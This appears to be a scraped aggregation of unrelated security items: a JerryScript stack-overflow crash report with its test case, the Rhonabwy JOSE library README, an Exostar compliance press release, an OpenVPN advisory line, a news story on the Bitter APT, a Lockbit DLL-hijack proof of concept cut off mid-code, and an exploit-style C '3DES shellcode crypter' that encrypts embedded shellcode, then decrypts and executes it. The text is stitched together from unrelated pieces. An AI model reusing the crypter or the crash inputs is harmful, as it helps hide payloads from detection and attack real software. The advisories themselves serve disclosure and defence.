Jerryscript v2.4.0 was discovered to contain a stack buffer overflow via the function jerryx_print_unhandled_exception in /util/print.c.

**JerryScript revision**

0d49696  
master

**Build platform**

Ubuntu 16.04.7 LTS (Linux 4.15.0-142-generic x86\_64)

**Build steps**

./tools/build.py --clean --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es.next --stack-limit=15 --debug --logging=on --line-info=on

**Test case**

for (let \_\_v1 \= 0; \_\_v1 < 10000; \_\_v1++) {
    \['\_\_v6', '\_\_v2', '\_\_v1', '\_\_v3', '\_\_v4', '\_\_v5'\];"    \_\_v5(\_\_v1, 
}

\==112046==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda03d5390 at pc 0x7fa6aae1ea7d bp 0x7ffda03d5240 sp 0x7ffda03d49e8
READ of size 1 at 0x7ffda03d5390 thread T0
    #0 0x7fa6aae1ea7c in \_\_interceptor\_strtol (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x75a7c)
    #1 0x581203 in jerryx\_print\_unhandled\_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:247
    #2 0x4027c1 in main /home/lily/Desktop/67/jerryscript/jerry-main/main-desktop.c:172
    #3 0x7fa6aa6f683f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)
    #4 0x401e88 in \_start (/home/lily/Desktop/67/jerry+0x401e88)

Address 0x7ffda03d5390 is located in stack of thread T0 at offset 224 in frame
    #0 0x580e99 in jerryx\_print\_unhandled\_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:204

  This frame has 3 object(s):
    \[32, 36) 'source\_size'
    \[96, 104) 'current\_p'
    \[160, 224) 'buffer\_p' <== Memory access at offset 224 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 \_\_interceptor\_strtol
Shadow bytes around the buggy address:
  0x100034072a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072a50: 00 00 00 00 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2
  0x100034072a60: f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00
=\>0x100034072a70: 00 00\[f3\]f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00
  0x100034072a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==112046==ABORTING

CVE-2022-32117: Stack-buffer-overflow  in jerryx_print_unhandled_exception (jerryscript/jerry-ext/util/print.c) · Issue #5008 · jerryscript-project/jerryscript

Rhonabwy before v1.1.5 was discovered to contain a buffer overflow via the component r_jwe_aesgcm_key_unwrap. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted JWE token.

**Rhonabwy - Javascript Object Signing and Encryption (JOSE) library - JWK, JWKS, JWS, JWE and JWT**

 

*   Create, modify, parse, import or export JSON Web Keys (JWK) and JSON Web Keys Set (JWKS)
*   Create, modify, parse, validate or serialize JSON Web Signatures (JWS)
*   Create, modify, parse, validate or serialize JSON Web Encryption (JWE)
*   Create, modify, parse, validate or serialize JSON Web Token (JWT)

JWT Relies on JWS and JWE functions, so it supports the same functionalities as the other 2. JWT functionalities also support nesting serialization (JWE nested in a JWS or the opposite).

*   Supported Cryptographic Algorithms (alg) for Digital Signatures and MACs:

"alg" Param Value

Digital Signature or MAC Algorithm

Supported

HS256

HMAC using SHA-256

**YES**

HS384

HMAC using SHA-384

**YES**

HS512

HMAC using SHA-512

**YES**

RS256

RSASSA-PKCS1-v1\_5 using SHA-256

**YES**

RS384

RSASSA-PKCS1-v1\_5 using SHA-384

**YES**

RS512

RSASSA-PKCS1-v1\_5 using SHA-512

**YES**

ES256

ECDSA using P-256 and SHA-256

**YES**(1)

ES384

ECDSA using P-384 and SHA-384

**YES**(1)

ES512

ECDSA using P-521 and SHA-512

**YES**(1)

PS256

RSASSA-PSS using SHA-256 and MGF1 with SHA-256

**YES**(1)

PS384

RSASSA-PSS using SHA-384 and MGF1 with SHA-384

**YES**(1)

PS512

RSASSA-PSS using SHA-512 and MGF1 with SHA-512

**YES**(1)

none

No digital signature or MAC performed

**YES**

EdDSA

Digital Signature with Ed25519 Elliptic Curve

**YES**(1)

ES256K

Digital Signature with secp256k1 Curve Key

_NO_

(1) GnuTLS 3.6 minimum is required for ECDSA, Ed25519 (EdDSA) and RSA-PSS signatures.

*   Supported Encryption Algorithm (enc) for JWE payload encryption:

"enc" Param Value

Content Encryption Algorithm

Supported

A128CBC-HS256

AES\_128\_CBC\_HMAC\_SHA\_256 authenticated encryption algorithm, as defined in Section 5.2.3

**YES**

A192CBC-HS384

AES\_192\_CBC\_HMAC\_SHA\_384 authenticated encryption algorithm, as defined in Section 5.2.4

**YES**

A256CBC-HS512

AES\_256\_CBC\_HMAC\_SHA\_512 authenticated encryption algorithm, as defined in Section 5.2.5

**YES**

A128GCM

AES GCM using 128-bit key

**YES**

A192GCM

AES GCM using 192-bit key

**YES** (2)

A256GCM

AES GCM using 256-bit key

**YES**

(2) GnuTLS 3.6.14 minimum is required for A192GCM enc.

*   Supported Cryptographic Algorithms (alg) for Key Management:

"alg" Param Value

Key Management Algorithm

Supported

RSA1\_5

RSAES-PKCS1-v1\_5

**YES**

RSA-OAEP

RSAES OAEP using default parameters

**YES**(3)

RSA-OAEP-256

RSAES OAEP using SHA-256 and MGF1 with SHA-256

**YES**

A128KW

AES Key Wrap with default initial value using 128-bit key

**YES**(3)

A192KW

AES Key Wrap with default initial value using 192-bit key

**YES**(3)

A256KW

AES Key Wrap with default initial value using 256-bit key

**YES**(3)

dir

Direct use of a shared symmetric key as the CEK

**YES**

ECDH-ES

Elliptic Curve Diffie-Hellman Ephemeral Static key agreement using Concat KDF

**YES**(4)

ECDH-ES+A128KW

ECDH-ES using Concat KDF and CEK wrapped with "A128KW"

**YES**(4)

ECDH-ES+A192KW

ECDH-ES using Concat KDF and CEK wrapped with "A192KW"

**YES**(4)

ECDH-ES+A256KW

ECDH-ES using Concat KDF and CEK wrapped with "A256KW"

**YES**(4)

A128GCMKW

Key wrapping with AES GCM using 128-bit key

**YES**

A192GCMKW

Key wrapping with AES GCM using 192-bit key

**YES**(5)

A256GCMKW

Key wrapping with AES GCM using 256-bit key

**YES**

PBES2-HS256+A128KW

PBES2 with HMAC SHA-256 and "A128KW" wrapping

**YES**(5)

PBES2-HS384+A192KW

PBES2 with HMAC SHA-384 and "A192KW" wrapping

**YES**(5)

PBES2-HS512+A256KW

PBES2 with HMAC SHA-512 and "A256KW" wrapping

**YES**(5)

(3) Nettle 3.4 minimum is required for RSA-OAEP and AES key Wrap

(4) Nettle 3.6 minimum is required for ECDH-ES

(5) GnuTLS 3.6.14 minimum is required for A192GCMKW, PBES2-HS256+A128KW, PBES2-HS384+A192KW and PBES2-HS512+A256KW key wrapping algorithms.

**rnbyc, Rhonabwy command-line tool**

This command-line program can be used to:

*   Generate and/or parse keys and output the result in a JWKS or a public/private pair of JWKS files.
*   Parse, decrypt, and/or verify signature of a JWT, using given key
*   Serialize a JWT, the JWT can be signed, encrypted or nested

Example commands to generate a RSA2048 key pair, serialize a JWT signed with the private key, then parse the serialized token and verifies the signature with the public key.

$ rnbyc -j -g RSA2048 -o priv.jwks -p pub.jwks
$ rnbyc -s '{"iss":"https://rhonabwy.tld","aud":"abcxyz1234"}' -K priv.jwks -a RS256
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6ImVNdnI3bktBX2I5QUI4NGpMU05zTFFKZHRmdHpadnllV2M1V0VVMjhnRFkifQ.eyJpc3MiOiJodHRwczovL3Job25hYnd5LnRsZCIsImF1ZCI6ImFiY3h5ejEyMzQifQ.j6v-yxcWvHhyLIc-r3Nzn5rCF9yeJJzgyLSHW\_10wREfckspbzf8UTof5Zsrwg8JvKNlJ4Tt4ZffJC4BkkehdBYXPrgcfq9NtvNYsRmAdiNJhOXtZCU9j9X89j2xhY7pRBgWENI9c3730cmAUgaC-IUKsoNRw\_dd-eboyrgYKIzUCYRnuwqDB31T2oUSVjy6CckoenyoeHJhHg-x384G-g4ovP1l-L4YpjgCyr6BR8mjBFwHU56MP6hNN299HpUd56usQ3vMn7z5hL6QqE92qz-SsJBySrv8whLWjjN9J4Wq5g3\_R7Qw00x60bFnuCDhPBjg3EPXXGqlI0x0vwgwHw
$ rnbyc -P pub.jwks -t eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6ImVNdnI3bktBX2I5QUI4NGpMU05zTFFKZHRmdHpadnllV2M1V0VVMjhnRFkifQ.eyJpc3MiOiJodHRwczovL3Job25hYnd5LnRsZCIsImF1ZCI6ImFiY3h5ejEyMzQifQ.j6v-yxcWvHhyLIc-r3Nzn5rCF9yeJJzgyLSHW\_10wREfckspbzf8UTof5Zsrwg8JvKNlJ4Tt4ZffJC4BkkehdBYXPrgcfq9NtvNYsRmAdiNJhOXtZCU9j9X89j2xhY7pRBgWENI9c3730cmAUgaC-IUKsoNRw\_dd-eboyrgYKIzUCYRnuwqDB31T2oUSVjy6CckoenyoeHJhHg-x384G-g4ovP1l-L4YpjgCyr6BR8mjBFwHU56MP6hNN299HpUd56usQ3vMn7z5hL6QqE92qz-SsJBySrv8whLWjjN9J4Wq5g3\_R7Qw00x60bFnuCDhPBjg3EPXXGqlI0x0vwgwHw
Token signature verified
{
  "iss": "https://rhonabwy.tld",
  "aud": "abcxyz1234"
}

Check its documentation

**API Documentation**

Documentation is available in the documentation page: https://babelouest.github.io/rhonabwy/

Example program to parse and verify the signature of a JWT using its public key in JWK format:

/\*\*
 \* To compile this program run:
 \* gcc -o demo\_rhonabwy demo\_rhonabwy.c -lrhonabwy
 \*/
#include <stdio.h\>
#include <rhonabwy.h\>

int main(void) {
  const char token\[\] = "eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiIsImtpZCI6IjEifQ."                                     // Header
                       "eyJzdHIiOiJwbG9wIiwiaW50Ijo0Miwib2JqIjp0cnVlfQ."                                         // Claims
                       "ooXNEt3JWFGMuvkGUM-szUOU1QTu4DvyC3qQP64UGeeJQuMGupBCVATnGkiqNLiPSJ9uBsjZbyUrWe8z7Iag\_A"; // Signature

  const char jwk\_pubkey\_ecdsa\_str\[\] = "{"
                                        "\\"kty\\":\\"EC\\","
                                        "\\"crv\\":\\"P-256\\","
                                        "\\"alg\\":\\"ES256\\","
                                        "\\"x\\":\\"MKBCTNIcKUSDii11ySs3526iDZ8AiTo7Tu6KPAqv7D4\\","
                                        "\\"y\\":\\"4Etl6SRW2YiLUrN5vfvVHuhp7x8PxltmWWlbbM4IFyM\\","
                                        "\\"kid\\":\\"1\\","
                                        "\\"use\\":\\"sig\\""
                                      "}";

  unsigned char output\[2048\];
  size\_t output\_len = 2048;
  jwk\_t \* jwk = NULL;
  jwt\_t \* jwt = NULL;
  char \* claims;

  if ((jwk = r\_jwk\_quick\_import(R\_IMPORT\_JSON\_STR, jwk\_pubkey\_ecdsa\_str)) != NULL && (jwt = r\_jwt\_quick\_parse(token, R\_PARSE\_NONE, 0)) != NULL) {
    if (r\_jwk\_export\_to\_pem\_der(jwk, R\_FORMAT\_PEM, output, &output\_len, 0) == RHN\_OK) {
      printf("Exported key:\\n%.\*s\\n", (int)output\_len, output);
      if (r\_jwt\_verify\_signature(jwt, jwk, 0) == RHN\_OK) {
        claims = r\_jwt\_get\_full\_claims\_str(jwt);
        printf("Verified payload:\\n%s\\n", claims);
        r\_free(claims);
      } else {
        fprintf(stderr, "Error r\_jwt\_verify\_signature\\n");
      }
    } else {
      fprintf(stderr, "Error r\_jwk\_export\_to\_pem\_der\\n");
    }
  } else {
    fprintf(stderr, "Error parsing\\n");
  }
  r\_jwk\_free(jwk);
  r\_jwt\_free(jwt);

  return 0;
}

**Installation**

Rhonabwy is available in the following distributions.

**Dependencies**

Rhonabwy is based on Nettle, GnuTLS, Jansson, zlib, libcurl and libsystemd (if possible), you must install those libraries first before building Rhonabwy.

You also need check and Ulfius to run the tests.

**Prerequisites**

You need Orcania and Yder.

Those libraries are included in the package rhonabwy-dev-full_{x.x.x}_{OS}_{ARCH}.tar.gz in the Latest release page. If you're building with CMake, they will be automatically downloaded and installed if missing.

**Pre-compiled packages**

You can install Rhonabwy with a pre-compiled package available in the release pages.

**rhonabwy-dev-full packages**

The rhonabwy-dev-full contain 4 different packages:

*   liborcania-dev\_x.x.x\_.ext
*   libyder-dev\_y.y.y\_.ext
*   libulfius-dev\_z.z.z\_.ext
*   librhonabwy-dev\_a.a.a\_.ext

You only need to install liborcania-dev_*, libyder-dev_* for librhonabwy-dev_* to work. libulfius-dev_* isn't required unless you want to run the test suite.

**Manual install****CMake - Multi architecture**

CMake minimum 3.5 is required.

Run the CMake script in a sub-directory, example:

$ git clone https://github.com/babelouest/rhonabwy.git
$ cd rhonabwy/
$ mkdir build
$ cd build
$ cmake ..
$ make && sudo make install

The available options for CMake are:

*   -DWITH_JOURNALD=[on|off] (default on): Build with journald (SystemD) support
*   -BUILD_RHONABWY_TESTING=[on|off] (default off): Build unit tests
*   -DINSTALL_HEADER=[on|off] (default on): Install header file rhonabwy.h
*   -DBUILD_RPM=[on|off] (default off): Build RPM package when running make package
*   -DCMAKE_BUILD_TYPE=[Debug|Release] (default Release): Compile with debugging symbols or not
*   -DBUILD_STATIC=[on|off] (default off): Compile static library
*   -DBUILD_RHONABWY_DOCUMENTATION=[on|off] (default off): Build documentation with doxygen
*   -DWITH_CURL=[on|off] (default on): Use libcurl to download remote content

**Good ol' Makefile**

Download Rhonabwy from GitHub repository, compile and install.

$ git clone https://github.com/babelouest/rhonabwy.git
$ cd rhonabwy/src
$ make
$ sudo make install

To disable curl library on build (to avoid its dependencies), you can pass the option DISABLE_CURL=1 to the make command.

$ cd rhonabwy/src
$ make DISABLE\_CURL=1
$ sudo make install

By default, the shared library and the header file will be installed in the /usr/local location. To change this setting, you can modify the DESTDIR value in the src/Makefile.

Example: install Rhonabwy in /tmp/lib directory

$ cd src
$ make && make DESTDIR=/tmp install

You can install Rhonabwy without root permission if your user has write access to $(DESTDIR). A ldconfig command is executed at the end of the install, it will probably fail if you don't have root permission, but this is harmless. If you choose to install Rhonabwy in another directory, you must set your environment variable LD_LIBRARY_PATH properly.

CVE-2022-32096: GitHub - babelouest/rhonabwy: Javascript Object Signing and Encryption (JOSE) library - JWK, JWKS, JWS, JWE and JWT

Upgrades to the Exostar platform promote secure, compliant collaboration and handling of controlled unclassified information.

**HERNDON, VA, July 12, 2022 –** Exostar, a leader in trusted, secure business collaboration in highly regulated industries including aerospace and defense, today announced the availability of updates to The Exostar Platform that allow small and medium-sized businesses (SMBs) to overcome the technology, time, and cost obstacles of preparing for and demonstrating compliance with Department of Defense (DoD) cybersecurity requirements.

Firms throughout the Defense Industrial Base (DIB), including SMBs deep in the DoD supply chain, will have to acquire Cybersecurity Maturity Model Certification (CMMC) 2.0 certification as soon as May 2023 to participate in subsequent DoD contract solicitations. According to CMMC version 2.0, any member of the DIB that stores or handles Controlled Unclassified Information (CUI) during program execution must meet the 110 practices defined at CMMC Maturity Level 2. Many SMBs simply do not possess the expertise, bandwidth, or budget to go it alone.

Exostar’s Managed Microsoft 365 for CMMC directly addresses these challenges. This managed solution, based on Microsoft Teams and hosted in a Microsoft 365 Government Cloud Computing (GCC) High environment, is designed specifically for SMBs and delivers benefits including:

*   A secure workspace for SMB users within GCC High – without the expense and burden of acquiring, setting up, and managing their own tenant.
*   Rapid onboarding – subscribe today and be working tomorrow.
*   Implementation of the security controls necessary to properly protect CUI – and facilitate compliance with CMMC 2.0 and other DoD cybersecurity standards.
*   Enterprise-grade security at a price SMBs can afford, with room to grow for an enterprise license.

In addition to the launch of Exostar’s Managed Microsoft 365 for CMMC, the company has updated and upgraded its CMMC Ready Suite within The Exostar Platform to provide out-of-the-box support to accelerate SMBs throughout their CMMC 2.0 accreditation journeys:

*   Certification Assistant – Offers plainspoken descriptions of CMMC practices at all three Maturity Levels, helping SMBs to conduct compliance self-assessments and scoring, gather documentation, and prepare for any necessary third-party audits ahead of accreditation.
*   Exostar PolicyPro – Evaluates existing policies (including gap analysis) and/or generates new ones in accordance with all policy requirements defined in CMMC 2.0 practices.
*   CMMC 2.0 Basic Assessment – Provides expert guidance from Exostar-vetted cybersecurity compliance specialist partners who use Exostar’s CMMC Ready Suite to address an SMB’s unique circumstances and accelerate the accreditation process.

“SMBs are the lifeblood of the DIB. While they must improve their cybersecurity capabilities to better protect CUI throughout the DoD supply chain, CMMC 2.0 represents a heavy lift for many of these companies,” said Tony Farinaro, Exostar’s Chief Revenue Officer. “We continue to enhance and expand our CMMC offerings to make it easier and more cost effective for SMBs to meet their obligations so they can stay in the DIB, win business, and keep innovating on behalf of the DoD.”

In addition to SMBs, enterprises also can subscribe to Exostar’s Managed Microsoft 365 for CMMC, as well as purchase the other applications and services in The Exostar Platform’s CMMC Ready Suite, today.

**About Exostar**

The Exostar Platform supports exclusive communities within highly regulated industries where organizations securely collaborate, share information, and operate compliantly. Within these communities, we build trust. More than 150,000 companies and agencies in 175 countries trust Exostar to strengthen security, reduce expenditures, raise productivity, and help them achieve their digital transformation initiatives. Nearly half of the Defense Industrial Base, including 98 of the top 100, transact business over The Exostar Platform. Eleven of the top twenty global biopharmaceutical companies rely on The Exostar Platform to help them speed new medicines and therapies to market. Exostar is a Gartner Cool Vendor. For more information, please visit www.exostar.com, and follow Exostar on LinkedIn and Twitter.

Exostar Empowers SMBs with Enhanced, Low-Cost, Easy-to-Use Microsoft 365 and CMMC 2.0 Solutions

    # Exploit Title: 3DES Shellcode crypter# Date: 08/07/2022# Exploit Author: d7x# Tested on: Ubuntu x86 / Ubuntu x86_64 / Debian 11 "bullseye"cat > 3des_crypter.c << EOF/* *** * *  3DES Shellcode crypter by d7x * *  d7x.promiselabs.net * *  Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_crypter 3des_crypter.c -lssl -lcrypto * * ***/#include <stdio.h>#include <stdlib.h>#include <string.h>#include <openssl/des.h>/* Triple DES key for Encryption and Decryption */DES_cblock Key1 = "3DES";DES_cblock Key2 = "Crypter";DES_cblock Key3 = "by d7x";DES_key_schedule SchKey1,SchKey2,SchKey3;/* Print Encrypted and Decrypted bytes */void print_data(const char *tittle, const void* data, int len);int main(){  /* Apply 3DES keys */   DES_set_key((DES_cblock *)Key1, &SchKey1);  DES_set_key((DES_cblock *)Key2, &SchKey2);  DES_set_key((DES_cblock *)Key3, &SchKey3);  /* Place shellcode here */  unsigned char input_data[] = "\xbb\xcc\xfe\x70\x5c\xdb\xd8\xd9\x74\x24\xf4\x5d\x29\xc9\xb1\x08\x83\xc5\x04\x31\x5d\x11\x03\x5d\x11\xe2\x39\x67\x1a\x53\x99\xca\x33\x6c\x19\xeb\xc3\x5c\x6d\x86\xb3\x8d\xeb\x58\x6f\xba\x0c\x59\x8f\x3a\xab\x97\x0f\x50\x4a\x70\xdd\x25";   /* => chmods /tmp/f to 0777 */  /* Init vector */  DES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };  // DES_cblock iv = { 0xe1, 0xe2, 0xe3, 0xd4, 0xd5, 0xc6, 0xc7, 0xa8 };  DES_set_odd_parity(&iv);    /* Check for Weak key generation: https://www.openssl.org/docs/manmaster/man3/DES_set_key_checked.html,     * If the key is a weak key, then -2 is returned */  if ( -2 == (DES_set_key_checked(&Key1, &SchKey1) || DES_set_key_checked(&Key2, &SchKey2) || DES_set_key_checked(&Key3, &SchKey3)))  {    printf(" Weak key ....\n");    return 1;  }    /* Buffers for Encryption and Decryption */  unsigned char* cipher[sizeof(input_data)];  unsigned char* text[sizeof(input_data)];    /* Triple-DES CBC Encryption */  DES_ede3_cbc_encrypt( (unsigned char*)input_data, (unsigned char*)cipher, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv, DES_ENCRYPT);    /* Triple-DES CBC Decryption */  memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value  DES_set_odd_parity(&iv);  DES_ede3_cbc_encrypt( (unsigned char*)cipher, (unsigned char*)text, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);  /* Place the encrypted output here to verify the integrity */  unsigned char c[] = \"\xd5\x0c\x1e\xee\xfd\x1f\xb4\x50\xac\xde\x1a\x59\x4c\x10\xe9\x7a\x2c\xb0\x09\x79\x2c\xe0\x28\x17\xf4\x60\xc9\x0a\x33\x27\x48\x03\xc4\x8d\x4d\x26\x0b\x7c\xdd\xa9\xcf\x65\x0f\xac\xd3\xc2\xa8\x67\xde\xf6\x83\x02\x8a\x01\xa8\x1f\x95\x23\x94\x25\xdf\xce\xa3\x79\x0c\xdc\x81\xf7";  unsigned char decrypted[sizeof(c)];  // DES_set_odd_parity(&iv);  memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value  DES_set_odd_parity(&iv);  DES_ede3_cbc_encrypt( (unsigned char*)c, (unsigned char*)decrypted, sizeof(c), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);    /* Printing and Verifying */  print_data("\n Original ",input_data,strlen(input_data));  print_data("\n Encrypted",cipher,strlen(cipher));  print_data("\n Decrypted",text,strlen(input_data));  print_data("\n Decrypted (manual) ",decrypted,strlen(decrypted));  /* Run shellcode */  /* int (*ret)() = (int(*)())decrypted;  ret(); */    return 0;}void print_data(const char *tittle, const void* data, int len){  printf("%s : ",tittle);  const unsigned char * p = (const unsigned char*)data;  int i = 0;    /* len-1 to omit the \x00 null terminator at the end */  for (; i<len;++i)    printf("\\x%02x", *p++);  printf(" Size: %d", len);    printf("\n");}EOFcat > 3des_decrypt.c << EOF/* *** * *  3DES Shellcode crypter by d7x * *  d7x.promiselabs.net * *  Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_decrypt 3des_decrypt.c -lssl -lcrypto * * ***/#include <stdio.h>#include <stdlib.h>#include <string.h>#include <openssl/des.h>/* Triple DES key for Encryption and Decryption */DES_cblock Key1 = "3DES";DES_cblock Key2 = "Crypter";DES_cblock Key3 = "by d7x";DES_key_schedule SchKey1,SchKey2,SchKey3;/* Print Encrypted and Decrypted data packets */void print_data(const char *tittle, const void* data, int len);main(){  /* Apply 3DES keys */  DES_set_key((DES_cblock *)Key1, &SchKey1);  DES_set_key((DES_cblock *)Key2, &SchKey2);  DES_set_key((DES_cblock *)Key3, &SchKey3);  /* Encrypted shellcode generated by 3des_crypter */  unsigned char shellcode_3des[] = \"\xd5\x0c\x1e\xee\xfd\x1f\xb4\x50\xac\xde\x1a\x59\x4c\x10\xe9\x7a\x2c\xb0\x09\x79\x2c\xe0\x28\x17\xf4\x60\xc9\x0a\x33\x27\x48\x03\xc4\x8d\x4d\x26\x0b\x7c\xdd\xa9\xcf\x65\x0f\xac\xd3\xc2\xa8\x67\xde\xf6\x83\x02\x8a\x01\xa8\x1f\x95\x23\x94\x25\xdf\xce\xa3\x79\x44\x5d\x82\xff\x40\x5d\x82\xff\x06";  /* Init vector */  DES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };  DES_set_odd_parity(&iv);    /* buffer for the decrypted string */  unsigned char* decrypted[sizeof(shellcode_3des)];  /* Triple-DES CBC Decryption */  memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value  DES_set_odd_parity(&iv);  DES_ede3_cbc_encrypt( (unsigned char*)shellcode_3des, (unsigned char*)decrypted, sizeof(shellcode_3des), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);    memcpy(shellcode_3des, decrypted, strlen(decrypted) );  // strcpy(shellcode_3des, decrypted);  /* Printing and executing */  print_data("\n Encrypted",shellcode_3des,sizeof(shellcode_3des));  print_data("\n Decrypted",decrypted,strlen(decrypted));  /* Run shellcode */  int (*ret)() = (int(*)())shellcode_3des;   ret();    return 0;}void print_data(const char *tittle, const void* data, int len){  printf("%s : ",tittle);  const unsigned char * p = (const unsigned char*)data;  int i = 0;  /* len-1 to omit the \x00 null terminator at the end */  for (; i<len;++i)    printf("\\x%02x", *p++);  printf(" Size: %d", len);    printf("\n");} EOF

3DES Shellcode Crypter

OpenVPN Access Server 2.10 and prior versions are susceptible to resending multiple packets in a response to a reset packet sent from the client which the client again does not respond to, resulting in a limited amplification attack.

CVE-2021-4234: Access Server Release Notes | OpenVPN

Military entities located in Bangladesh continue to be at the receiving end of sustained cyberattacks by an advanced persistent threat tracked as Bitter.
"Through malicious document files and intermediate malware stages the threat actors conduct espionage by deploying Remote Access Trojans," cybersecurity firm SECUINFRA said in a new write-up published on July 5.
The findings from the

Military entities located in Bangladesh continue to be at the receiving end of sustained cyberattacks by an advanced persistent threat tracked as Bitter.

"Through malicious document files and intermediate malware stages the threat actors conduct espionage by deploying Remote Access Trojans," cybersecurity firm SECUINFRA said in a new write-up published on July 5.

The findings from the Berlin-headquartered company build on a previous report from Cisco Talos in May, which disclosed the group's expansion in targeting to strike Bangladeshi government organizations with a backdoor called ZxxZ.

Bitter, also tracked under the codenames APT-C-08 and T-APT-17, is said to be active since at least late 2013 and has a track record of targeting China, Pakistan, and Saudi Arabia using different tools such as BitterRAT and ArtraDownloader.

The latest attack chain detailed by SECUINFRA is believed to have been conducted in mid-May 2022, originating with a weaponized Excel document likely distributed by means of a spear-phishing email that, when opened, exploits the Microsoft Equation Editor exploit (CVE-2018-0798) to drop the next-stage binary from a remote server.

ZxxZ (or MuuyDownloader by the Qi-Anxin Threat Intelligence Center), as the downloaded payload is called, is implemented in Visual C++ and functions as a second-stage implant that allows the adversary to deploy additional malware.

The most notable change in the malware is that it has dropped using "ZxxZ" as the separator used when sending information back to the command-and-control (C2) server in favor of an underscore, suggesting that the group is actively making modifications to its source code to stay under the radar.

Also put to use by the threat actor in its campaigns is a backdoor dubbed Almond RAT, a .NET-based RAT that first came to light in May 2022 and offers basic data gathering functionality and the ability to execute arbitrary commands. Additionally, the implant employs obfuscation and string encryption techniques to evade detection and to hinder analysis.

"Almond RATs main purposes seem to be file system discovery, data exfiltration and a way to load more tools/establish persistence," the researchers said. "The design of the tools seems to be laid out in a way that it can be quickly modified and adapted to the current attack scenario."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Bitter APT Hackers Continue to Target Bangladesh Military Entities

Lockbit version 3.0 ransomware looks for and executes DLLs in its current directory. Therefore, we can hijack a DLL, in this case "RstrtMgr.dll", execute our own code, and terminate the malware pre-encryption. The exploit DLL checks if the current directory is "C:\Windows\System32" and if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/38745539b71cf201bb502437f891d799_B.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Ransom Lockbit 3.0 Vulnerability: Code ExecutionDescription: The ransomware apparently now requires a password to execute as noted by "@vxunderground" E.g. "-pass db66023ab2abcb9957fb01ed50cdfa6a". Lockbit looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL in this case "RstrtMgr.dll", execute our own code and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.Family: LockbitType: PE32MD5: 38745539b71cf201bb502437f891d799Vuln ID: MVID-2022-0621Disclosure: 07/04/2022Video PoC URL: https://www.youtube.com/watch?v=tAXrRcsnzjYExploit/PoC:1) Compile the following C code as "RstrtMgr.dll"2) Place the DLL in same directory as Lockbit 3.03) Optional - Hide it: attrib +s +h "RstrtMgr.dll"4) Run Lockbit 3.0 {04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe -k LocalServiceNetworkRestricted -pass db66023ab2abcb9957fb01ed50cdfa6a#include "windows.h"//By malvuln - 7/4/2022//Purpose: RCE in Lockbit 3.0 ransomware//MD5: 38745539b71cf201bb502437f891d799//gcc -c RstrtMgr.c -m32//gcc -shared -o RstrtMgr.dll RstrtMgr.o -m32/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "Ransom Lockbit 3.0 aka LockShit\nPWNED by Malvuln", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   if(GetCurrentDirectory(MAX_PATH, buf))   if(strcmp("C:\\Windows\\System32", buf) != 0){      HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           